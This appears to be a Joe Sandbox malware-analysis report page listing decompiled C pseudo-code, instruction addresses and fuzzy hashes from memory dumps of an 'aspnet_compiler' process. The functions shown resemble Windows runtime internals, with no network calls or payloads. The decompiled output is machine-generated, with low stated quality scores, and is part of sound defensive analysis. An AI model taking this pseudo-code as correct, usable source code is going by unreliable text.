								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x11cb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x11c84c0;
										if(_t69 >=  *0x11c84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E011A9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E010D922A(_t82);
							_t53 = E010F7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E011A8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x11c86c0; // 0xe107b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x11c86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x11c86bc;
										_t72 = 0x11c86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E010D9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x11c86c4;
									_t72 = 0x11c86c0;
									L18:
									E01109B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x010d9100
0x010d9100
0x010d9100
0x010d9100
0x010d9102
0x010d9107
0x010d910c
0x010d9110
0x010d9115
0x010d9136
0x010d9143
0x011337e4
0x011337e4
0x010d9149
0x010d914e
0x010d914e
0x010d9117
0x010d911d
0x00000000
0x00000000
0x010d911f
0x010d9125
0x00000000
0x010d9151
0x010d9158
0x010d915d
0x010d9161
0x010d9168
0x01133715
0x00000000
0x010d916e
0x010d916e
0x010d9175
0x010d9177
0x010d917e
0x010d917f
0x010d9182
0x010d9182
0x010d9187
0x010d9187
0x010d918a
0x010d918d
0x010d918f
0x010d9192
0x010d9195
0x010d9198
0x010d9198
0x010d9198
0x010d919a
0x00000000
0x00000000
0x0113371f
0x01133721
0x01133727
0x0113372f
0x01133733
0x01133735
0x01133738
0x0113373b
0x0113373d
0x01133740
0x00000000
0x00000000
0x01133746
0x01133749
0x00000000
0x00000000
0x0113374f
0x01133751
0x00000000
0x00000000
0x01133757
0x01133759
0x0113375c
0x0113375c
0x0113375e
0x0113375e
0x01133761
0x01133764
0x00000000
0x00000000
0x01133766
0x01133768
0x011337a3
0x011337a3
0x011337a5
0x011337a7
0x011337ad
0x011337b0
0x011337b2
0x011337bc
0x011337c2
0x011337c2
0x011337b2
0x010d9187
0x010d9187
0x010d918a
0x010d918d
0x010d918f
0x010d9192
0x010d9195
0x00000000
0x010d9195
0x00000000
0x010d9187
0x0113376a
0x0113376a
0x0113376c
0x0113376c
0x0113376f
0x01133775
0x00000000
0x00000000
0x01133777
0x01133779
0x00000000
0x00000000
0x01133782
0x01133787
0x01133789
0x01133790
0x01133790
0x0113378b
0x0113378b
0x0113378b
0x01133792
0x01133795
0x01133795
0x01133798
0x01133798
0x0113379b
0x0113379b
0x010d91a3
0x010d91a9
0x010d91b0
0x010d91b4
0x010d91b4
0x010d91bb
0x010d91c0
0x010d91c5
0x010d91c7
0x011337da
0x010d91cd
0x010d91cd
0x010d91cd
0x010d91d2
0x010d91d5
0x010d9239
0x010d9239
0x010d91d7
0x010d91db
0x010d91e1
0x010d91e7
0x010d91fd
0x010d9203
0x010d921e
0x010d9223
0x00000000
0x010d9223
0x010d9205
0x010d9208
0x010d920c
0x010d9214
0x010d9214
0x010d91e9
0x010d91e9
0x010d91ee
0x010d91f3
0x010d91f3
0x010d91f3
0x010d91e7
0x00000000
0x010d91db
0x010d9187
0x010d9168

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa543de201b2cae3586960f8a8b8685f54f93695b7c501e87d0fcd1aac4140a
Instruction ID: 6c41914330ab33f71354fba09c5a542e33bf5bbd16d02dc908e0e3f90b7ba206
Opcode Fuzzy Hash: 3fa543de201b2cae3586960f8a8b8685f54f93695b7c501e87d0fcd1aac4140a
Instruction Fuzzy Hash: 7631D079A01746DFDB6ADF7CC088BACBBF1BB88318F18819DC59467241C334A980CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01101DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01101DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E010FF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L010F4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E010FF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x01101dc2
0x01101dc5
0x01101dc7
0x01101dcc
0x01101dce
0x01101dd6
0x01101ddf
0x01101de0
0x01101de1
0x01101de5
0x01101de8
0x01101def
0x01101df0
0x01101df6
0x01101df7
0x01101dfe
0x01101e1a
0x00000000
0x00000000
0x01101e0b
0x01101e12
0x01101e12
0x01101e00
0x01101e00
0x01101e05
0x01101e1e
0x01101e23
0x0114570f
0x01145713
0x00000000
0x00000000
0x01145719
0x01145719
0x01101e2c
0x01101e2d
0x01101e2e
0x01101e2f
0x01101e31
0x01101e32
0x01101e35
0x01101e3d
0x01145723
0x0114573d
0x0114573d
0x00000000
0x01145723
0x01101e49
0x01101e4e
0x01101e4e
0x01101e09
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 78159a66ec9b15adc4cbc6220a7d9a9c9c1e01468a71f08bf045dc9db25ca70a
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 29216072A00229FBD71BCF59C880EAEBBB9EF85740F114065FA0597250D774EE41C790

Uniqueness

Uniqueness Score: -1.00%

Function 01156C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01156C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E010F7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x11c7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L010F4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0111F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E010F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01119AE0();
						_t23 = L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x01156c0a
0x01156c0f
0x01156c10
0x01156c13
0x01156c15
0x01156c19
0x01156c1c
0x01156c21
0x01156c28
0x01156c3a
0x01156c2a
0x01156c33
0x01156c33
0x01156c3f
0x01156c48
0x01156c4d
0x01156c60
0x01156c65
0x01156c69
0x01156c73
0x01156c79
0x01156c7f
0x01156c86
0x01156c90
0x01156c94
0x01156ca6
0x01156cb2
0x01156cbd
0x01156cbd
0x01156cc3
0x01156cc7
0x01156ccb
0x01156cd0
0x01156cd1
0x01156ce2
0x01156ce2
0x01156c69
0x01156ced

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9246659c603b8134a4fb476ceb9d095e4a059d8c60cd0c83cd96001532d70a7f
Instruction ID: d222791e455182b679076725a2993856dea5bf6570c773af459d1fb88e0f86f9
Opcode Fuzzy Hash: 9246659c603b8134a4fb476ceb9d095e4a059d8c60cd0c83cd96001532d70a7f
Instruction Fuzzy Hash: D52177B2A00645AFD719DB68D880E6AB7B8FF48744F140069FA08DBB91D734ED50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 011190AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E011190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0112D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0110E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L010F4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0111F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0110A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x011190af
0x011190b8
0x011190bb
0x011190bf
0x011190c2
0x011190c2
0x011190c8
0x011190cb
0x011190cd
0x011514d7
0x011514eb
0x011514eb
0x00000000
0x011514eb
0x011514db
0x011514e6
0x00000000
0x011514f2
0x011514e8
0x00000000
0x011514e8
0x011190d8
0x011190da
0x011190dd
0x011190e5
0x00000000
0x01119139
0x011190fa
0x011190fe
0x01119142
0x00000000
0x01119142
0x01119104
0x01119107
0x0111910b
0x01119110
0x01119118
0x01119147
0x01119148
0x0111914f
0x01119150
0x01119151
0x01119152
0x01119156
0x0111915d
0x01119160
0x01119168
0x0111916c
0x011191bc
0x011191be
0x00000000
0x011191be
0x0111916e
0x01119173
0x01119176
0x00000000
0x00000000
0x0111917c
0x01119180
0x011191b5
0x00000000
0x011191b5
0x01119182
0x01119185
0x01119189
0x00000000
0x00000000
0x0111918e
0x01119190
0x01119198
0x00000000
0x00000000
0x011191a0
0x00000000
0x011191ad
0x011191ad
0x011191b0
0x011191b1
0x00000000
0x01119185
0x0111911a
0x0111911c
0x0111911f
0x01119125
0x01119127
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: a1f4a7152b4465627cbb2d4826fce5da4e38a975088710de3c3bbc7f66cda651
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: AF218071A00209EFDB25DF59C844AAAFBF8EB54324F15887AE959A7240D370ED44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01103B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01103B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x11c84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x11c84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x11c84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0111AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0111FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x11c84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x11c84c4; // 0x0
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x01103b89
0x01103b96
0x01103ba1
0x01103bab
0x01103bb5
0x01103bb9
0x01146298
0x01103bbf
0x01103bc2
0x01103bc3
0x01103bc9
0x01103bca
0x01103bcc
0x01103bcd
0x01103bd4
0x01103bd6
0x01103bdb
0x01103bea
0x01103bf7
0x01103bfb
0x01103bff
0x01103c09
0x01103c0a
0x01103c0b
0x01103c0f
0x01103c14
0x01103c18
0x01103c18
0x01103bfb
0x01103c1b
0x01103c30
0x01103c30
0x01103c3d

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55afdb4bbc3675aacdc32092dc5dd7f2857fe4b5a92959aa776ad2cf39ba705
Instruction ID: 3a4e4c3383cc65e31fd398022e177e596749a334c11af991e5bc11a504d5c084
Opcode Fuzzy Hash: a55afdb4bbc3675aacdc32092dc5dd7f2857fe4b5a92959aa776ad2cf39ba705
Instruction Fuzzy Hash: 3C21BE72A00109AFC719DF58DE81BAABBBDFB44708F150079EA08EB251D371AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01156CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01156CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E010F7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E010F7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x10b5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0110F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0110F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01157016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L010F2400( &_v52);
								}
								_t21 = L010F2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x01156cfb
0x01156d00
0x01156d02
0x01156d06
0x01156d0a
0x01156d0e
0x01156d19
0x01156d2b
0x01156d1b
0x01156d24
0x01156d24
0x01156d33
0x01156d39
0x01156d46
0x01156d4f
0x01156d61
0x01156d51
0x01156d5a
0x01156d5a
0x01156d69
0x01156d6b
0x01156d6d
0x01156d6f
0x01156d6f
0x01156d74
0x01156d79
0x01156d7a
0x01156d7f
0x01156d82
0x01156d88
0x01156d89
0x01156d90
0x01156d94
0x01156da7
0x01156db1
0x01156db1
0x01156dbb
0x01156dbb
0x01156d90
0x01156d69
0x01156d46
0x01156dc6

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b1085e9c7e5f525dbdb9daea0f7a8a1b0039dc5b2b5f6837281931d3086a32
Instruction ID: 4bb29710e1789e09b54791174fbd82acbd02be8650ad8f4b2c3cd554697e050b
Opcode Fuzzy Hash: 04b1085e9c7e5f525dbdb9daea0f7a8a1b0039dc5b2b5f6837281931d3086a32
Instruction Fuzzy Hash: 6A21F572500245DBD715EF28C944BABBBECAF91640F44095AFED0C7291DB34D949C6E2

Uniqueness

Uniqueness Score: -1.00%

Function 011A070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E011A070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E011A07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0119AFDE( &_v8,  &_v12);
					E011A1293(_t38, _v28, _t60);
					if(E010F7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E011914FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x011a071b
0x011a0724
0x011a0734
0x011a0738
0x011a074b
0x011a074b
0x011a0753
0x011a0753
0x011a0759
0x011a075d
0x011a0774
0x011a0779
0x011a077d
0x011a0789
0x011a0795
0x011a07a7
0x011a0797
0x011a07a0
0x011a07a0
0x011a07af
0x011a07c4
0x011a07cd
0x011a07cd
0x011a07af
0x011a07dc

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 6a5619b2634020705ce024b52728aee7be4f324fe2bc837ade1f8435fa8eb69a
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 6321043A204600AFD719DF58C884B6ABFA5EFD8350F048569F9958B381D730DD09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01157794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01157794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x11c7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0111F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E010F7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01119AE0();
					_t24 = L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x01157799
0x0115779a
0x0115779b
0x011577a3
0x011577ab
0x011577ae
0x011577b1
0x011577b1
0x011577bf
0x011577c4
0x011577c8
0x011577ce
0x011577d4
0x011577e0
0x011577e0
0x011577d6
0x011577d6
0x011577de
0x00000000
0x00000000
0x011577de
0x011577e5
0x011577f0
0x011577f3
0x011577f6
0x011577fd
0x01157800
0x0115780c
0x01157818
0x0115782b
0x0115781a
0x01157823
0x01157823
0x01157830
0x01157831
0x01157838
0x0115783d
0x0115783e
0x0115784f
0x0115784f
0x0115785a

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db9268526324bf20909f9c82124c7d85825646fcabe435db9dddc2bf72c249db
